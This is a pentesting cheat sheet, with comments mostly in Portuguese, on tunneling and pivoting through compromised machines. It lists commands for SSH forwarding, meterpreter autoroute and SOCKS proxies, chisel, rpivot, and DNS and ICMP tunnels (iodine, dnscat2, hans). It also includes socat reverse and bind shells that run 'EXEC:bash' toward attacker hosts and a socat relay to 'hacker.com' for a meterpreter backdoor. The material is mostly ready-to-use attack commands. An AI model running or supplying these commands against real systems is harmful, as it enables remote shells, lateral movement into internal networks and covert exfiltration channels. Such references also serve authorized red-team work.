Tunneling and Port Forwarding

ssh -Y -C <user>@<ip> # -Y é menos seguro, mas mais rápido que -X

ssh -R 0.0.0.0:10521:127.0.0.1:1521 user@10.0.0.1 #Porta local 1521 acessível na porta 10521 de qualquer lugar

ssh -R 0.0.0.0:10521:10.0.0.1:1521 user@10.0.0.1 #Porta remota 1521 acessível na porta 10521 de qualquer lugar

ssh -i ssh_key <usuario>@<ip_comprometido> -L <porta_do_atacante>:<ip_da_vitima>:<porta_remota> [-p <porta_ssh>] [-N -f]  #Dessa forma, o terminal ainda está em seu host

#Exemplo
sudo ssh -L 631:<ip_da_vitima>:631 -N -f -l <usuário> <ip_comprometido>

ssh -f -N -D <porta_do_atacante> <usuario>@<ip_comprometido> #Tudo enviado para a porta local irá ser redirecionado para o servidor comprometido (uso como proxy)

ssh username@server -w any:any #Isso criará interfaces Tun em ambos os dispositivos.
ip addr add 1.1.1.2/32 peer 1.1.1.1 dev tun0 #Client side VPN IP
ip addr add 1.1.1.1/32 peer 1.1.1.2 dev tun0 #Server side VPN IP

echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A POSTROUTING -s 1.1.1.2 -o eth0 -j MASQUERADE

route add -net 10.0.0.0/16 gw 1.1.1.1

pip install sshuttle
sshuttle -r user@host 10.10.10.10/24

# Inside a meterpreter session
portfwd add -l <porta_do_atacante> -p <porta_remota> -r <host_remoto>

background# meterpreter session
route add <ip_vitima> <máscara_de_rede> <sessão> # (ex: route add 10.10.10.14 255.255.255.0 8)
use auxiliary/server/socks_proxy
run #Proxy port 1080 by default
echo "socks4 127.0.0.1 1080" > /etc/proxychains.conf #Proxychains

background #meterpreter session
use post/multi/manage/autoroute
set SESSION <session_n>
set SUBNET <New_net_ip> #Ex: set SUBNET 10.1.13.0
set NETMASK <Netmask>
run
use auxiliary/server/socks_proxy
set VERSION 4a
run #Proxy port 1080 by default
echo "socks4 127.0.0.1 1080" > /etc/proxychains.conf #Proxychains

python reGeorgSocksProxy.py -p 8080 -u http://upload.sensepost.net:8080/tunnel/tunnel.jsp

./chisel server -p 8080 --reverse #Server
./chisel-x64.exe client 10.10.14.3:8080 R:socks #Client
#E agora você pode usar proxychains com a porta 1080 (padrão)

./chisel_1.7.6_linux_amd64 server -p 12312 --reverse
./chisel_1.7.6_linux_amd64 client 10.10.14.20:12312 R:4505:127.0.0.1:4505

attacker> python server.py --server-port 9999 --server-ip 0.0.0.0 --proxy-ip 127.0.0.1 --proxy-port 1080

victim> python client.py --server-ip <rpivot_server_ip> --server-port 9999

victim> python client.py --server-ip <rpivot_server_ip> --server-port 9999 --ntlm-proxy-ip <proxy_ip> --ntlm-proxy-port 8080 --domain CONTOSO.COM --username Alice --password P@ssw0rd

victim> python client.py --server-ip <rpivot_server_ip> --server-port 9999 --ntlm-proxy-ip <proxy_ip> --ntlm-proxy-port 8080 --domain CONTOSO.COM --username Alice --hashes 9b9850751be2515c8231e5189015bbe6:49ef7638d69a01f26d96ed673bf50c45

victim> socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane
attacker> socat FILE:`tty`,raw,echo=0 TCP:<victim_ip>:1337

attacker> socat TCP-LISTEN:1337,reuseaddr FILE:`tty`,raw,echo=0
victim> socat TCP4:<attackers_ip>:1337 EXEC:bash,pty,stderr,setsid,sigint,sane

socat TCP-LISTEN:<lport>,fork TCP:<redirect_ip>:<rport> &

socat TCP-LISTEN:1234,fork SOCKS4A:127.0.0.1:google.com:80,socksport=5678

#Crie o backdoor do meterpreter na porta 3333 e inicie o listener do msfconsole nessa porta
attacker> socat OPENSSL-LISTEN:443,cert=server.pem,cafile=client.crt,reuseaddr,fork,verify=1 TCP:127.0.0.1:3333

victim> socat.exe TCP-LISTEN:2222 OPENSSL,verify=1,cert=client.pem,cafile=server.crt,connect-timeout=5|TCP:hacker.com:443,connect-timeout=5
#Execute o meterpreter

OPENSSL,verify=1,cert=client.pem,cafile=server.crt,connect-timeout=5|PROXY:hacker.com:443,connect-timeout=5|TCP:proxy.lan:8080,connect-timeout=5

# Execute este comando em ambos os lados
FILENAME=socatssl
openssl genrsa -out $FILENAME.key 1024
openssl req -new -key $FILENAME.key -x509 -days 3653 -out $FILENAME.crt
cat $FILENAME.key $FILENAME.crt >$FILENAME.pem
chmod 600 $FILENAME.key $FILENAME.pem

attacker-listener> socat OPENSSL-LISTEN:433,reuseaddr,cert=server.pem,cafile=client.crt EXEC:/bin/sh
victim> socat STDIO OPENSSL-CONNECT:localhost:433,cert=client.pem,cafile=server.crt

attacker> sudo socat TCP4-LISTEN:443,reuseaddr,fork TCP4-LISTEN:2222,reuseaddr #Redirect port 2222 to port 443 in localhost 
victim> while true; do socat TCP4:<attacker>:443 TCP4:127.0.0.1:22 ; done # Conecte-se à porta 443 do invasor e tudo que vier daqui será redirecionado para a porta 22
attacker> ssh localhost -p 2222 -l www-data -i vulnerable #Conecta-se ao SSH da vítima

echo y | plink.exe -l <nosso_username_valido> -pw <senha_valida> [-p <porta>] -R <porta_no_nosso_host>:<proximo_ip>:<porta_final> <seu_ip>
echo y | plink.exe -l root -pw password [-p 2222] -R 9090:127.0.0.1:9090 10.11.0.41 #Porta local 9090 para a porta 9090 externa

http-proxy <proxy_ip> 8080 <file_with_creds> ntlm

Username Alice 
Password P@ssw0rd 
Domain CONTOSO.COM 
Proxy 10.0.0.10:8080 
Tunnel 2222:<attackers_machine>:443

atacante> iodined -f -c -P P@ssw0rd 1.1.1.1 tunneldomain.com
vítima> iodine -f -P P@ssw0rd tunneldomain.com -r
#Você pode ver a vítima no 1.1.1.2

ssh <user>@1.1.1.2 -C -c blowfish-cbc,arcfour -o CompressionLevel=9 -D 1080

atacante> ruby ./dnscat2.rb tunneldomain.com
vítima> ./dnscat2 tunneldomain.com

session -i <sessions_id>
listen [lhost:]lport rhost:rport #Ex: listen 127.0.0.1:8080 10.0.0.20:80, this bind 8080port in attacker host

./hans -v -f -s 1.1.1.1 -p P@ssw0rd #Start listening (1.1.1.1 is IP of the new vpn connection)
./hans -f -c <server_ip> -p P@ssw0rd -v
ping 1.1.1.100 #Após uma conexão bem sucedida, A vítima estara acessível pelo ip 1.1.1.100